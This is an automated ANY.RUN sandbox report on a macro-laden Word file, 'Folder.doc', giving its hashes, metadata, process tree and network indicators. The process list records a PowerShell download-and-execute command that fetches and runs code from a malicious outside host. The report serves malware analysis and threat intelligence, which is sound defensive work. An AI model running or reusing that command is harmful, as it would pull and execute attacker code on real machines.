analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Folder.doc

Full analysis: https://app.any.run/tasks/5eb93404-b284-4f0b-8de9-3828856cdf5c
Verdict: Malicious activity
Analysis date: October 14, 2019, 11:18:53
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
maldoc-4
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Administrator, Template: Normal.dotm, Last Saved By: salvolp, Revision Number: 6, Name of Creating Application: Microsoft Office Word, Total Editing Time: 06:00, Create Time/Date: Wed Sep 25 14:02:00 2019, Last Saved Time/Date: Fri Oct 4 14:14:00 2019, Number of Pages: 1, Number of Words: 9, Number of Characters: 54, Security: 0
MD5:

763269EDD28F3E4D37B6C1F32D6B267F

SHA1:

E15D206E747B16B5B4114D46FB7C684D0B3FC445

SHA256:

0E9531446EF0549757182541A3F06B7A98F554F11ABDA0A02015BDB2F821DA6B

SSDEEP:

768:iC3hskfJyrnl5SuxelIylxLPHJ2DvhZImJhHi/o5ZbxhjMaac8ESrkB:iC3hskRSSuclIyTPHkDD+WZbxXa8Sr

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executes PowerShell scripts

      • WINWORD.EXE (PID: 1576)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 1576)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 3944)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 1576)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 1576)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (80)

EXIF

FlashPix

Title: -
Subject: -
Author: Administrator
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: salvolp
RevisionNumber: 6
Software: Microsoft Office Word
TotalEditTime: 6.0 minutes
CreateDate: 2019:09:25 13:02:00
ModifyDate: 2019:10:04 13:14:00
Pages: 1
Words: 9
Characters: 54
Security: None
CodePage: Windows Latin 1 (Western European)
Company: -
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 62
AppVersion: 12
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts:
HeadingPairs:
  • Titolo
  • 1
  • Title
  • 1
CompObjUserTypeLen: 43
CompObjUserType: Documento di Microsoft Office Word 97-2003
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
37
Monitored processes
2
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
1576"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Folder.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3944"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ((New-Object Net.WebClient).DownloadString('http://home.isdes.com/?need=9f5b9ee&vid=dpec5&92183'));C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 825
Read events
1 089
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
0
Unknown types
2

Dropped files

PID
Process
Filename
Type
1576WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRA90C.tmp.cvr
MD5:
SHA256:
3944powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6L3FK0QOIARB61AXH3NS.temp
MD5:
SHA256:
3944powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF39b272.TMPbinary
MD5:35375F3D71AE42AA9777154D256B33BF
SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF
3944powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:35375F3D71AE42AA9777154D256B33BF
SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF
1576WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$Folder.docpgc
MD5:C31D12CAC794A7315472FF9BA58F0F5A
SHA256:0715026750596E0DBECE27C6648696603C678B273A63B75CD92420B670B39FFC
1576WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:8B378DCC62035BBABEF8B1C2A131A338
SHA256:7C1F83E56B3CF1632E1D1DDD8BFD13219F8133599041726FA2EA3FB98B22B275
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3944
powershell.exe
GET
185.189.149.169:80
http://home.isdes.com/?need=9f5b9ee&vid=dpec5&92183
CH
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3944
powershell.exe
185.189.149.169:80
home.isdes.com
SOFTplus Entwicklungen GmbH
CH
malicious

DNS requests

Domain
IP
Reputation
home.isdes.com
  • 185.189.149.169
malicious

Threats

No threats detected
No debug info